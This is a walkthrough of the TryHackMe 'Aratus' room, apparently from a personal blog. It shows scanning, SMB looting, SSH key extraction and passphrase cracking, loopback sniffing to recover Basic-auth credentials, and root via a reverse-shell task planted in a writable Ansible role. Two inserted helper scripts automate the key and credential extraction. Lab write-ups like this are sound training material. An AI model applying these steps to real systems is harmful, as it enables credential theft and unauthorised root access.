Aratus on TryHackMe is an interesting room. Below is the path I found that worked for me; it doesn't cover everything I tried, it's simply the path I took that worked!
Scoping out a library…
I started out with my masscan and nmap commands;
masscan -p1-65535 <THM_IP> --rate=1000 -e tun0 > ports
awk '{print $4}' ports | sed 's|[/tcp,]||g' > nmapports
nmap -sC -sV -p "$(paste -sd, nmapports)" -Pn -oN ./nmapinitial <THM_IP>
From my port scan, there were a few ways we could go:

So, to summarise: FTP had nothing… The site seemed like a rabbit hole, BUT SMB… that looked interesting…

Starting off with the message to Simeon: apparently he's left his password everywhere! Looks like I need to find a password!
How Much Reading do I need to do!
I decided to download everything from the SMB share to look through it locally, using the following smbclient commands:
recurse on
prompt off
mget *
With that downloaded, I started searching for "Password", "PWD" etc. and found… nothing!
But when I searched for ID with
find . -type f -exec grep -H 'ID' {} \;

So, let's copy that into a file called id_rsa, then chmod 600 id_rsa, and then we can use
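Grepping for a single word is brittle, so here is how I would do the search-and-extract step in a way that works for any key type: find files in the downloaded share that carry a private-key header, cut the key block out into id_rsa with the 0600 mode ssh insists on, and check whether the classic PEM "Proc-Type" header says a passphrase is needed. This is an added example, not the author's commands; the sample share contents it builds are constructed, and the base64 in the fake key is filler, not a real key.

```shell
#!/bin/sh
# Added example, not from the original writeup: search a tree downloaded from
# an SMB share for private-key material, pull the key out into id_rsa and set
# the 0600 mode ssh requires. Sample files in demo_key_hunt are constructed.

# Print every file under $1 that contains a PEM/OpenSSH private-key header
# (covers "RSA PRIVATE KEY", "OPENSSH PRIVATE KEY", "EC PRIVATE KEY", ...).
find_private_keys() {
    grep -rl -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$1" 2>/dev/null
}

# Copy the first BEGIN...END block from $1 into $2 with mode 0600.
# Returns non-zero if no block was found, so callers can chain with &&.
extract_key() {
    src="$1"; out="$2"
    sed -n '/-----BEGIN [A-Z ]*PRIVATE KEY-----/,/-----END [A-Z ]*PRIVATE KEY-----/p' "$src" > "$out"
    chmod 600 "$out"
    [ -s "$out" ]
}

# Classic PEM keys advertise a passphrase with a Proc-Type header. New-format
# OpenSSH keys keep the cipher name inside the base64 body, so a "no" here
# does not prove the key is unencrypted; ssh2john reports either kind.
key_is_encrypted() {
    grep -q '^Proc-Type: 4,ENCRYPTED' "$1"
}

# Build a constructed share dump in a temp dir and run the three helpers.
demo_key_hunt() {
    d=$(mktemp -d)
    mkdir -p "$d/share/docs"
    printf 'Meeting notes, nothing secret.\n' > "$d/share/docs/notes.txt"
    # Constructed key body: the base64 below is filler, not a real key.
    printf 'My ID for the new server:\n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n\nQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=\n-----END RSA PRIVATE KEY-----\nregards\n' > "$d/share/docs/backup.txt"

    for f in $(find_private_keys "$d/share"); do
        echo "key material in: $f"
        extract_key "$f" "$d/id_rsa" && echo "extracted to $d/id_rsa"
        if key_is_encrypted "$d/id_rsa"; then
            echo "passphrase needed: run ssh2john first"
        fi
    done
    rm -rf "$d"
}

demo_key_hunt
```

Point find_private_keys at the directory you pulled the share into; anything it lists is worth opening by hand, since a key pasted into a text file is often surrounded by the hint you need (who it belongs to, which host it is for).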
ssh -i id_rsa simeon@10.10.5.226
We have our initial foothold now?

Absolutely not! That would be too easy!
Not a problem; to crack the passphrase:
ssh2john id_rsa > sshrsa #if this isn't already installed, links at the end
john sshrsa -w=<path_to_rockyou>
Now we're in, let's see what we can do!
Not much I can do!
Looking at Simeon, it's clear we need to escalate! So, I transferred over LSE (see the links at the end) by starting a Python web server on my local machine and using curl on the remote machine.

So what did LSE find?
START PID USER COMMAND
14:18 8770 theodore /usr/bin/python3 /home/theodore/scripts/test-www-auth.py
START PID USER COMMAND
14:18 8771 root ping -c 30 127.0.0.1
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
Theodore has a script running (test-www-auth.py) that looks like it authenticates to something on the host, root is pinging localhost, and tcpdump carries cap_net_raw+eip, so we can sniff the loopback interface without being root. Let's see what we can find with:
tcpdump -i lo -A

Looks like we have a base64-encoded credential; base64 is encoding, not encryption, so anyone who can sniff the loopback can read it. Using CyberChef we can decode this.
With that decoded use su with the username and password you decoded!
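The capture-and-decode step can be scripted instead of pasting into CyberChef. The block below is an added example, not the author's commands: it pulls every distinct "Authorization: Basic" value out of a saved tcpdump -A capture and base64-decodes it. The capture it writes is constructed to resemble what theodore's script might send (the user name theodore is from the LSE output; the password ExamplePass123 is made up for the example), and the port-80 filter in the comment is an assumption; drop the filter if you are not sure which port the script talks to.

```shell
#!/bin/sh
# Added example, not from the original writeup: recover HTTP Basic credentials
# from a plaintext loopback capture. Basic auth is base64, not encryption, so
# anyone who can read the traffic can read the password. The capture below is
# constructed; the real thing is whatever tcpdump prints for you. On the box,
# with tcpdump holding cap_net_raw, an unprivileged user can capture with
# (port 80 is an assumption):
#   tcpdump -i lo -A -s 0 -l 'tcp port 80' | tee /tmp/lo.txt

# Print each distinct user:password carried in an "Authorization: Basic"
# header found in the capture file given as $1. The character class stops
# before the \r that ends HTTP header lines, so CRLF does not corrupt the
# base64.
extract_basic_creds() {
    grep -o 'Authorization: Basic [A-Za-z0-9+/=]*' "$1" \
        | awk '{print $3}' | sort -u \
        | while read -r b64; do
              printf '%s' "$b64" | base64 -d 2>/dev/null && printf '\n'
          done
}

# Write a constructed tcpdump -A style capture to $1: an unauthenticated
# request followed by two requests carrying the same header, to show the
# de-duplication. The header value decodes to theodore:ExamplePass123.
write_sample_capture() {
    cat > "$1" <<'EOF'
14:18:01.000001 IP localhost.51234 > localhost.http: Flags [P.], seq 1:130, ack 1, win 512, length 129
E....@.@.........
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.25.1

14:18:01.000002 IP localhost.51236 > localhost.http: Flags [P.], seq 1:190, ack 1, win 512, length 189
E....@.@.........
GET /admin HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.25.1
Authorization: Basic dGhlb2RvcmU6RXhhbXBsZVBhc3MxMjM=

14:18:02.000003 IP localhost.51238 > localhost.http: Flags [P.], seq 1:190, ack 1, win 512, length 189
E....@.@.........
GET /admin HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.25.1
Authorization: Basic dGhlb2RvcmU6RXhhbXBsZVBhc3MxMjM=

EOF
}

demo_capture=$(mktemp)
write_sample_capture "$demo_capture"
extract_basic_creds "$demo_capture"   # prints theodore:ExamplePass123
rm -f "$demo_capture"
```

Save the live capture with tee as in the comment, run extract_basic_creds over it, and feed the result to su. Because theodore's script re-authenticates on a schedule, you may need to leave tcpdump running for a minute before the header shows up.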
Privesc part 2 – Return of LSE
Grabbing the user flag first…

I decided to run LSE again, this time giving it the password for the user I had switched to (LSE uses it for the sudo checks). This gave us some things to try to escalate to root.
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User theodore may run the following commands on aratus:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh
---
[*] fst000 Writable files outside user's home.............................. yes!
---
/run/dbus/system_bus_socket
/run/systemd/private
/run/systemd/journal/socket
/run/systemd/journal/stdout
/run/systemd/notify
/var/tmp
/var/spool/mail/theodore
/var/spool/samba
/tmp
/tmp/.XIM-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.font-unix
/tmp/tmp.hEy9yFmRea
/tmp/tmp.JAdtOrZ9vB
/home/simeon/message-to-simeon.txt
/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
/opt/ansible/README.txt
Let's look at the script we can run as automation with sudo:
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml
Looking at the script we can see it runs every .yaml playbook in /opt/ansible/playbooks; luckily, the role task file that is writable by our current user (/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml, from the LSE output above) is pulled in by those playbooks, so any task we add to it runs under that sudo invocation. To read more on how playbooks and roles work, the documentation is found here: https://docs.ansible.com/ansible/latest/user_guide/playbooks.html.
I decided to try the easy way: inserting a task into the yaml file to run a bash reverse shell, which sounded too easy on reflection!
Lets Get Root!
Using a bash reverse shell (I used an online generator), create a reverse.sh file in /tmp using vim and paste your reverse shell into it as below.

Then save this by pressing the escape key and typing :wq.
Next we need to add a task to configure-RedHat.yml that chmods our reverse.sh. Open it with:
vim /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml

Save this as before and lets run it with;
sudo -u automation /opt/scripts/infra_as_code.sh
Now that the playbook run has made our reverse.sh executable, let's actually run it by amending the yaml file again as below, and start a listener on the port we specified in the bash script.

Save this as before and run the script again.
sudo -u automation /opt/scripts/infra_as_code.sh

We now have a root shell and we can get the root flag!
Conclusion
I really enjoyed this room! The lateral movement process was interesting, sniffing the network traffic! I could have done the initial foothold a few different ways, e.g. SSH brute force, but in a real task this would have set off some alarm bells!
Thank you to Biniru for the challenge!!
If you have any suggestions for any rooms you want to see, get in touch here!
Marc
Links
Aratus Room – https://tryhackme.com/room/aratus
SSH2John – https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py
LSE – https://github.com/diego-treitos/linux-smart-enumeration